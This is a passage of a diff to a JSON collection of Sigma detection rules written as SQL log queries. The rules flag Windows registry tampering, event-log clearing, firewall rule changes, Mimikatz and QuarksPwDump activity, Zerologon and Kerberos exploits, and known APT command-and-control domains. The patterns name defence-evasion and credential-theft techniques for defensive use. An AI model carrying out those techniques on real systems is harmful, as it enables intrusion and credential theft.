'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR 
ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": 
"registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Legitimate admin script" - ], + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_firewall_as_delete_rule.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules 
have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", 
+ "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "DHCP Server Loaded the 
CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], 
- "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_exploit_cve_2021_42287.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation 
(exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "falsepositives": [ - "Unknown" + "attack.t1210", + "attack.lateral_movement" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "title": "Vulnerable 
Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz 
Wydra, oscd.community", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.privilege_escalation" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": 